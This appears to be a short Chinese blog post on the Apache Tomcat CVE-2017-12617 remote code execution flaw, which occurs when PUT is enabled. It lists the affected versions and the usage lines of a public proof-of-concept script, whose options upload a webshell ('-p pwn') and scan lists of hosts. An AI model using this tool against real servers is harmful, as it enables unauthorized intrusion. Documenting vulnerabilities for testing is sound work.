Apache Tomcat漏洞 之 CVE-2017-12617

Apache Tomcat中发现的CVE-2017-12617严重远程代码执行(RCE)漏洞

影响启用了HTTP PUT的系统(通过将默认servlet的“只读”初始化参数设置为“false”)受到影响。如果默认servlet的参数只读设置为false,或者配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的Tomcat版本在所有操作系统上包含潜在危险的远程代码执行(RCE) WebDAV servlet的参数readonly被设置为false

POC:
git clone https://github.com/cyberheartmi9/CVE-2017-12617.git
用法:
选项:

-u, - url [::]检查目标网址是否易受攻击
-p, - pwn [::]生成webshel​​l并上传
–l,–list [::] hosts list

[+]用法:

./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py –url http://127.0.0.1
./cve-2017-12617.py -u http: //127.0.0.1 -p pwn
./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017- 12617.py –list hosts.txt
Apache Tomcat漏洞 之 CVE-2017-12617_第1张图片

如题测试 没有改漏洞。

你可能感兴趣的:(漏洞,tomcat漏洞)